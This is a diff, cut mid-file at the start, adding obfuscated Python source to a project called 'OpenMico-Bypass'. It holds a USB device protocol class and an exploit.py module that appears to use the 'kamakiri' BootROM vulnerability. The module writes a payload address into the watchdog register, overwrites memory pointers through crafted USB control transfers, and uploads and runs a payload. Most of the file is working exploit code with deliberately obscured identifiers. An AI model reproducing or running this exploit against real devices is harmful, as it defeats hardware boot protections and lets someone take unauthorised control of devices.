+                O000O000O00OO0OO0 =hex (O000O000O00OO0OO0 )#line:131
+            raise RuntimeError ("Unexpected output, expected {} got {}".format (O000O000O00OO0OO0 ,O0O0OOOOO0OOO0000 ))#line:133
+    def close (O0000O000OO0O00O0 ):#line:135
+        O0000O000OO0O00O0 .dev =None #line:136
+        O0000O000OO0O00O0 .rxbuffer =array .array ('B')#line:137
+        try :#line:138
+            usb .util .release_interface (O0000O000OO0O00O0 .udev ,0 )#line:139
+            usb .util .release_interface (O0000O000OO0O00O0 .udev ,1 )#line:140
+        except Exception :#line:141
+            pass #line:142
+        if not O0000O000OO0O00O0 .usbdk :#line:143
+            try :#line:144
+                O0000O000OO0O00O0 .udev .reset ()#line:145
+            except Exception :#line:146
+                pass #line:147
+        try :#line:148
+            O0000O000OO0O00O0 .udev .attach_kernel_driver (0 )#line:149
+        except Exception :#line:150
+            pass #line:151
+        try :#line:152
+            O0000O000OO0O00O0 .udev .attach_kernel_driver (1 )#line:153
+        except Exception :#line:154
+            pass #line:155
+        if not O0000O000OO0O00O0 .usbdk :#line:156
+            try :#line:157
+                usb .util .dispose_resources (O0000O000OO0O00O0 .udev )#line:158
+            except Exception :#line:159
+                pass #line:160
+        O0000O000OO0O00O0 .udev =None #line:161
+        time .sleep (1 )#line:162
+    def handshake (O0OO00000OOO0OO0O ):#line:164
+        OOO00O000O000O00O =b"\xA0\x0A\x50\x05"#line:165
+        O0O0O00O0O00OO0OO =0 #line:166
+        while O0O0O00O0O00OO0OO <len (OOO00O000O000O00O ):#line:167
+            O0OO00000OOO0OO0O .write (OOO00O000O000O00O [O0O0O00O0O00OO0OO ])#line:168
+            OO0O00OO0O0OOO0OO =O0OO00000OOO0OO0O .read (1 )#line:169
+            if OO0O00OO0O0OOO0OO and OO0O00OO0O0OOO0OO [0 ]==~OOO00O000O000O00O [O0O0O00O0O00OO0OO ]&0xFF :#line:170
+                O0O0O00O0O00OO0OO +=1 #line:171
+            else :#line:172
+                O0O0O00O0O00OO0OO =0 #line:173
+    def echo (OOO00OOO0O0OOOO00 ,O0OO0OO0OOOO00OO0 ,size =1 ):#line:175
+        OOO00OOO0O0OOOO00 .write (O0OO0OO0OOOO00OO0 ,size )#line:176
+        OOO00OOO0O0OOOO00 .check (from_bytes (OOO00OOO0O0OOOO00 .read (size ),size ),O0OO0OO0OOOO00OO0 )#line:177
+    def read (OOOOOOOOO0O00O000 ,size =1 ):#line:179
+        O000O000000O0OOO0 =0 #line:180
+        O00O00OO0O0OO000O =b""#line:181
+        while len (OOOOOOOOO0O00O000 .rxbuffer )<size :#line:182
+            try :#line:183
+                OOOOOOOOO0O00O000 .rxbuffer .extend (OOOOOOOOO0O00O000 .ep_in .read (OOOOOOOOO0O00O000 .ep_in .wMaxPacketSize ,OOOOOOOOO0O00O000 .timeout *1000 ))#line:184
+            except usb .core .USBError as OOOOOO0O0O00OO0O0 :#line:185
+                if OOOOOO0O0O00OO0O0 .errno ==110 :#line:186
+                    OOOOOOOOO0O00O000 .udev .reset ()#line:187
+                break #line:188
+        if size <=len (OOOOOOOOO0O00O000 .rxbuffer ):#line:189
+            OO000000OO0OO0OOO =OOOOOOOOO0O00O000 .rxbuffer [:size ]#line:190
+            OOOOOOOOO0O00O000 .rxbuffer =OOOOOOOOO0O00O000 .rxbuffer [size :]#line:191
+        else :#line:192
+            OO000000OO0OO0OOO =OOOOOOOOO0O00O000 .rxbuffer #line:193
+            OOOOOOOOO0O00O000 .rxbuffer =array .array ('B')#line:194
+        return bytes (OO000000OO0OO0OOO )#line:195
+    def read32 (OOOOO0OOO0OOOO000 ,OOO0O00O0OO0OO000 ,size =1 ):#line:197
+        O0O0O000O0000O00O =[]#line:198
+        OOOOO0OOO0OOOO000 .echo (0xD1 )#line:200
+        OOOOO0OOO0OOOO000 .echo (OOO0O00O0OO0OO000 ,4 )#line:201
+        OOOOO0OOO0OOOO000 .echo (size ,4 )#line:202
+        OOO0O0OO0000O000O =OOOOO0OOO0OOOO000 .dev .read (2 )#line:204
+        if from_bytes (OOO0O0OO0000O000O ,2 )>0xff :#line:205
+            raise RuntimeError ("status is {}".format (OOO0O0OO0000O000O .hex ()))#line:206
+        for _O00000O0O0OO000OO in range (size ):#line:208
+            O000O00OOOOOO0OO0 =from_bytes (OOOOO0OOO0OOOO000 .dev .read (4 ),4 )#line:209
+            O0O0O000O0000O00O .append (O000O00OOOOOO0OO0 )#line:210
+        OOO0O0OO0000O000O =OOOOO0OOO0OOOO000 .dev .read (2 )#line:212
+        if from_bytes (OOO0O0OO0000O000O ,2 )>0xff :#line:213
+            raise RuntimeError ("status is {}".format (OOO0O0OO0000O000O .hex ()))#line:214
+        if len (O0O0O000O0000O00O )==1 :#line:217
+            return O0O0O000O0000O00O [0 ]#line:218
+        else :#line:219
+            return O0O0O000O0000O00O #line:220
+    def write (OOOOOO0000O000O0O ,O0O000OO0O00OO00O ,size =1 ):#line:222
+        if type (O0O000OO0O00OO00O )!=bytes :#line:223
+            O0O000OO0O00OO00O =to_bytes (O0O000OO0O00OO00O ,size )#line:224
+        O0O0000O000O00O00 =0 #line:225
+        while O0O0000O000O00O00 <len (O0O000OO0O00OO00O ):#line:226
+            OOOOOO0000O000O0O .ep_out .write (O0O000OO0O00OO00O [O0O0000O000O00O00 :][:OOOOOO0000O000O0O .ep_out .wMaxPacketSize if len (O0O000OO0O00OO00O )-O0O0000O000O00O00 >OOOOOO0000O000O0O .ep_out .wMaxPacketSize else len (O0O000OO0O00OO00O )-O0O0000O000O00O00 ],OOOOOO0000O000O0O .timeout *1000 )#line:227
+            O0O0000O000O00O00 +=OOOOOO0000O000O0O .ep_out .wMaxPacketSize #line:228
+    def write32 (O0OOOOOOO0O00O0O0 ,O00O0OOO00O0OO00O ,O0OO0O00OOO0O000O ,check_status =True ):#line:230
+        if not isinstance (O0OO0O00OOO0O000O ,list ):#line:232
+            O0OO0O00OOO0O000O =[O0OO0O00OOO0O000O ]#line:233
+        O0OOOOOOO0O00O0O0 .echo (0xD4 )#line:235
+        O0OOOOOOO0O00O0O0 .echo (O00O0OOO00O0OO00O ,4 )#line:236
+        O0OOOOOOO0O00O0O0 .echo (len (O0OO0O00OOO0O000O ),4 )#line:237
+        O0OOOOOOO0O00O0O0 .check (O0OOOOOOO0O00O0O0 .dev .read (2 ),to_bytes (1 ,2 ))#line:239
+        for O0O0OO0OOOO0OO0O0 in O0OO0O00OOO0O000O :#line:241
+            O0OOOOOOO0O00O0O0 .echo (O0O0OO0OOOO0OO0O0 ,4 )#line:242
+        if check_status :#line:244
+            O0OOOOOOO0O00O0O0 .check (O0OOOOOOO0O00O0O0 .dev .read (2 ),to_bytes (1 ,2 ))#line:245
+    def get_target_config (OO0O000OO00O0OO0O ):#line:247
+        OO0O000OO00O0OO0O .echo (0xD8 )#line:248
+        O0OO0OO000OOOO000 =OO0O000OO00O0OO0O .dev .read (4 )#line:250
+        OOO000000O0O0OOO0 =OO0O000OO00O0OO0O .dev .read (2 )#line:251
+        if from_bytes (OOO000000O0O0OOO0 ,2 )!=0 :#line:253
+            raise RuntimeError ("status is {}".format (OOO000000O0O0OOO0 .hex ()))#line:254
+        O0OO0OO000OOOO000 =from_bytes (O0OO0OO000OOOO000 ,4 )#line:256
+        OOO0O0O0OO00O0O00 =O0OO0OO000OOOO000 &1 #line:258
+        OOOO00OOO00O0OO00 =O0OO0OO000OOOO000 &2 #line:259
+        O000OO000O000OOO0 =O0OO0OO000OOOO000 &4 #line:260
+        return bool (OOO0O0O0OO00O0O00 ),bool (OOOO00OOO00O0OO00 ),bool (O000OO000O000OOO0 )#line:263
+    def get_hw_code (OOO0OOO00000OOO0O ):#line:265
+        OOO0OOO00000OOO0O .echo (0xFD )#line:266
+        OOO0O00OOO0O00O0O =OOO0OOO00000OOO0O .dev .read (2 )#line:268
+        OOOO00O000O0O0000 =OOO0OOO00000OOO0O .dev .read (2 )#line:269
+        if from_bytes (OOOO00O000O0O0000 ,2 )!=0 :#line:271
+            raise RuntimeError ("status is {}".format (OOOO00O000O0O0000 .hex ()))#line:272
+        return from_bytes (OOO0O00OOO0O00O0O ,2 )#line:274
+    def get_hw_dict (OO0O00000O0O0O0O0 ):#line:276
+        OO0O00000O0O0O0O0 .echo (0xFC )#line:277
+        OO000O000O0OOO0O0 =OO0O00000O0O0O0O0 .dev .read (2 )#line:279
+        OOO0O0000OO0OO0O0 =OO0O00000O0O0O0O0 .dev .read (2 )#line:280
+        O0OOOOOO0OOOOOO0O =OO0O00000O0O0O0O0 .dev .read (2 )#line:281
+        OO00O00OO00O00000 =OO0O00000O0O0O0O0 .dev .read (2 )#line:282
+        if from_bytes (OO00O00OO00O00000 ,2 )!=0 :#line:284
+            raise RuntimeError ("status is {}".format (OO00O00OO00O00000 .hex ()))#line:285
+        return from_bytes (OO000O000O0OOO0O0 ,2 ),from_bytes (OOO0O0000OO0OO0O0 ,2 ),from_bytes (O0OOOOOO0OOOOOO0O ,2 )#line:287
+    def send_da (OO0000O000000O0OO ,O0O00OO0O0OOO00O0 ,OOOOOOOOO0OO000O0 ,OO000OO000000OOOO ,OOOO0OO00OO0O0OOO ):#line:289
+        OO0000O000000O0OO .echo (0xD7 )#line:290
+        OO0000O000000O0OO .echo (O0O00OO0O0OOO00O0 ,4 )#line:292
+        OO0000O000000O0OO .echo (OOOOOOOOO0OO000O0 ,4 )#line:293
+        OO0000O000000O0OO .echo (OO000OO000000OOOO ,4 )#line:294
+        O0OO0000OO00O0000 =OO0000O000000O0OO .dev .read (2 )#line:296
+        if from_bytes (O0OO0000OO00O0000 ,2 )!=0 :#line:298
+            raise RuntimeError ("status is {}".format (O0OO0000OO00O0000 .hex ()))#line:299
+        OO0000O000000O0OO .dev .write (OOOO0OO00OO0O0OOO )#line:301
+        OOOO0O00O0O0OOO0O =OO0000O000000O0OO .dev .read (2 )#line:303
+        O0OO0000OO00O0000 =OO0000O000000O0OO .dev .read (2 )#line:304
+        if from_bytes (O0OO0000OO00O0000 ,2 )!=0 :#line:306
+            raise RuntimeError ("status is {}".format (O0OO0000OO00O0000 .hex ()))#line:307
+        return from_bytes (OOOO0O00O0O0OOO0O ,2 )#line:309
+    def jump_da (O000OO0OOO00O00OO ,OO0O0O0OO0O0O00OO ):#line:311
+        O000OO0OOO00O00OO .echo (0xD5 )#line:312
+        O000OO0OOO00O00OO .echo (OO0O0O0OO0O0O00OO ,4 )#line:314
+        OO0O0O00OOOOO0OOO =O000OO0OOO00O00OO .dev .read (2 )#line:316
+        if from_bytes (OO0O0O00OOOOO0OOO ,2 )!=0 :#line:318
+            raise RuntimeError ("status is {}".format (OO0O0O00OOOOO0OOO .hex ()))#line:319
+    def cmd_da (O00O0OOOOO00000O0 ,O0O000O000OOOO00O ,OOOOOO00O0O0O00O0 ,O00O00OOOO0OOOO0O ,data =None ,check_status =True ):#line:321
+        O00O0OOOOO00000O0 .echo (0xDA )#line:322
+        O00O0OOOOO00000O0 .echo (O0O000O000OOOO00O ,4 )#line:324
+        O00O0OOOOO00000O0 .echo (OOOOOO00O0O0O00O0 ,4 )#line:325
+        O00O0OOOOO00000O0 .echo (O00O00OOOO0OOOO0O ,4 )#line:326
+        OOO000OOO0O0O00OO =O00O0OOOOO00000O0 .dev .read (2 )#line:328
+        if from_bytes (OOO000OOO0O0O00OO ,2 )!=0 :#line:330
+            raise RuntimeError ("status is {}".format (OOO000OOO0O0O00OO .hex ()))#line:331
+        if (O0O000O000OOOO00O &1 )==1 :#line:333
+            O00O0OOOOO00000O0 .dev .write (data )#line:334
+        else :#line:335
+            data =O00O0OOOOO00000O0 .dev .read (O00O00OOOO0OOOO0O )#line:336
+        if check_status :#line:338
+            OOO000OOO0O0O00OO =O00O0OOOOO00000O0 .dev .read (2 )#line:339
+            if from_bytes (OOO000OOO0O0O00OO ,2 )!=0 :#line:341
+                raise RuntimeError ("status is {}".format (OOO000OOO0O0O00OO .hex ()))#line:342
+        return data #line:344

OpenMico-Bypass/src/exploit.py

@@ -0,0 +1,71 @@
+from src .common import to_bytes ,from_bytes #line:1
+from src .logger import log #line:2
+import usb #line:4
+import array #line:5
+def exploit (O0OOO0O00OO00O0OO ,O0O0OOOOO0OO00O0O ,O0OO0000OO0O00O00 ,OO00O0000O0000OO0 ):#line:8
+    def OO00O0O00000O000O (OO000OOOOOO0O00O0 ,O00OOOOOO0OOO0O0O ,check_result =True ):#line:10
+        return OO00OO0OOOOO00O0O (0 ,OO000OOOOOO0O00O0 ,O00OOOOOO0OOO0O0O ,None ,check_result )#line:11
+    def O0OOO00OOOO0O0O0O (O00000OOO00OOO00O ,O0O0OOO00OO000OOO ,O0OO000OO00O0O000 ,check_result =True ):#line:13
+        return OO00OO0OOOOO00O0O (1 ,O00000OOO00OOO00O ,O0O0OOO00OO000OOO ,O0OO000OO00O0O000 ,check_result )#line:14
+    def OO00OO0OOOOO00O0O (O00O0O0O0OO00O0OO ,OO0000OO000000O0O ,OOOOOO0OOOO0O00OO ,data =None ,check_result =True ):#line:16
+            try :#line:17
+                O0OOO0O00OO00O0OO .cmd_da (0 ,0 ,1 )#line:18
+                O0OOO0O00OO00O0OO .read32 (OOO000O0OO000000O )#line:19
+            except :#line:20
+                pass #line:21
+            for OO0000O0OO00O0OO0 in range (3 ):#line:23
+                O0O000O000OOO0OO0 .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,OO0OO0O0O0O0OOOO0 +array .array ('B',to_bytes (O0O0OOOOO0OO00O0O .ptr_da +8 -3 +OO0000O0OO00O0OO0 ,4 ,'<')))#line:24
+                O0O000O000OOO0OO0 .ctrl_transfer (0x80 ,0x6 ,0x0200 ,0 ,9 )#line:25
+            if OO0000OO000000O0O <0x40 :#line:27
+                for OO0000O0OO00O0OO0 in range (4 ):#line:28
+                    O0O000O000OOO0OO0 .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,OO0OO0O0O0O0OOOO0 +array .array ('B',to_bytes (O0O0OOOOO0OO00O0O .ptr_da -6 +(4 -OO0000O0OO00O0OO0 ),4 ,'<')))#line:29
+                    O0O000O000OOO0OO0 .ctrl_transfer (0x80 ,0x6 ,0x0200 ,0 ,9 )#line:30
+                return O0OOO0O00OO00O0OO .cmd_da (O00O0O0O0OO00O0OO ,OO0000OO000000O0O ,OOOOOO0OOOO0O00OO ,data ,check_result )#line:31
+            else :#line:32
+                for OO0000O0OO00O0OO0 in range (3 ):#line:33
+                    O0O000O000OOO0OO0 .ctrl_transfer (0x21 ,0x20 ,0 ,0 ,OO0OO0O0O0O0OOOO0 +array .array ('B',to_bytes (O0O0OOOOO0OO00O0O .ptr_da -5 +(3 -OO0000O0OO00O0OO0 ),4 ,'<')))#line:34
+                    O0O000O000OOO0OO0 .ctrl_transfer (0x80 ,0x6 ,0x0200 ,0 ,9 )#line:35
+                return O0OOO0O00OO00O0OO .cmd_da (O00O0O0O0OO00O0OO ,OO0000OO000000O0O -0x40 ,OOOOOO0OOOO0O00OO ,data ,check_result )#line:36
+    OOO000O0OO000000O =O0O0OOOOO0OO00O0O .watchdog_address +0x50 #line:39
+    if not O0O0OOOOO0OO00O0O .ptr_usbdl or OO00O0000O0000OO0 .kamakiri :#line:41
+        log ("Using kamakiri")#line:42
+        O0OOO0O00OO00O0OO .write32 (OOO000O0OO000000O ,from_bytes (to_bytes (O0O0OOOOO0OO00O0O .payload_address ,4 ),4 ,'<'))#line:43
+        if O0O0OOOOO0OO00O0O .var_0 :#line:44
+            O00O0O000O0OOOO00 =O0O0OOOOO0OO00O0O .var_0 +0x4 #line:45
+            O0OOO0O00OO00O0OO .read32 (OOO000O0OO000000O -O0O0OOOOO0OO00O0O .var_0 ,O00O0O000O0OOOO00 //4 )#line:46
+        else :#line:47
+            O0OO000OOOO00OO00 =15 #line:48
+            for O0000OOO0O000OOOO in range (O0OO000OOOO00OO00 ):#line:49
+                O0OOO0O00OO00O0OO .read32 (OOO000O0OO000000O -(O0OO000OOOO00OO00 -O0000OOO0O000OOOO )*4 ,O0OO000OOOO00OO00 -O0000OOO0O000OOOO +1 )#line:50
+        O0OOO0O00OO00O0OO .echo (0xE0 )#line:52
+        O0OOO0O00OO00O0OO .echo (len (O0OO0000OO0O00O00 ),4 )#line:54
+        OO00OOOOO00O0O000 =O0OOO0O00OO00O0OO .read (2 )#line:56
+        if from_bytes (OO00OOOOO00O0O000 ,2 )!=0 :#line:57
+            raise RuntimeError ("status is {}".format (OO00OOOOO00O0O000 .hex ()))#line:58
+        O0OOO0O00OO00O0OO .write (O0OO0000OO0O00O00 )#line:60
+        O0OOO0O00OO00O0OO .read (4 )#line:63
+    O0O000O000OOO0OO0 =O0OOO0O00OO00O0OO .udev #line:65
+    try :#line:67
+        if not O0O0OOOOO0OO00O0O .ptr_usbdl or OO00O0000O0000OO0 .kamakiri :#line:68
+            try :#line:69
+                O0O000O000OOO0OO0 ._ctx .managed_claim_interface =lambda *O0O0O00000OO0O000 ,**O0O00O0O0O00OO0OO :None #line:71
+            except AttributeError as O0000OOOO0O0O0O0O :#line:72
+                raise RuntimeError ("libusb is not installed for port {}".format (O0OOO0O00OO00O0OO .dev .port ))from O0000OOOO0O0O0O0O #line:73
+            O0O000O000OOO0OO0 .ctrl_transfer (0xA1 ,0 ,0 ,O0O0OOOOO0OO00O0O .var_1 ,0 )#line:74
+        else :#line:75
+            OO0OO0O0O0O0OOOO0 =O0O000O000OOO0OO0 .ctrl_transfer (0xA1 ,0x21 ,0 ,0 ,7 )+array .array ('B',[0 ])#line:76
+            O0O00OO00O00000O0 =from_bytes (OO00O0O00000O000O (O0O0OOOOO0OO00O0O .ptr_usbdl ,4 ),4 ,'<')+8 ;#line:77
+            O0OOO00OOOO0O0O0O (O0O0OOOOO0OO00O0O .payload_address ,len (O0OO0000OO0O00O00 ),O0OO0000OO0O00O00 )#line:78
+            O0OOO00OOOO0O0O0O (O0O00OO00O00000O0 ,4 ,to_bytes (O0O0OOOOO0OO00O0O .payload_address ,4 ,'<'),False )#line:79
+    except usb .core .USBError as O0000OOOO0O0O0O0O :#line:81
+        print (O0000OOOO0O0O0O0O )#line:82
+    try :#line:86
+        O0OOO0O00OO00O0OO .dev .timeout =1 #line:87
+    except Exception :#line:88
+        pass #line:89
+    try :#line:91
+        O0OOOOOO0O00O00O0 =O0OOO0O00OO00O0OO .read (4 )#line:92
+    except usb .core .USBError as O0000OOOO0O0O0O0O :#line:93
+        print (O0000OOOO0O0O0O0O )#line:94
+        return False #line:95
+    return O0OOOOOO0O00O00O0 #line:97

OpenMico-Bypass/src/logger.py

@@ -0,0 +1,6 @@
+import datetime #line:1
+def log (O0O000O0OO00OOO00 ):#line:4
+    O0O0000O00O0O0OOO ="[{}] {}".format (datetime .datetime .now (),O0O000O0OO00OOO00 )#line:5
+    print (O0O0000O00O0O0OOO )#line:6
+    with open ("bypass_utility.log","a")as O000O0O000O0OO0OO :#line:8
+        O000O0O000O0OO0OO .write (O0O0000O00O0O0OOO +"\n")#line:9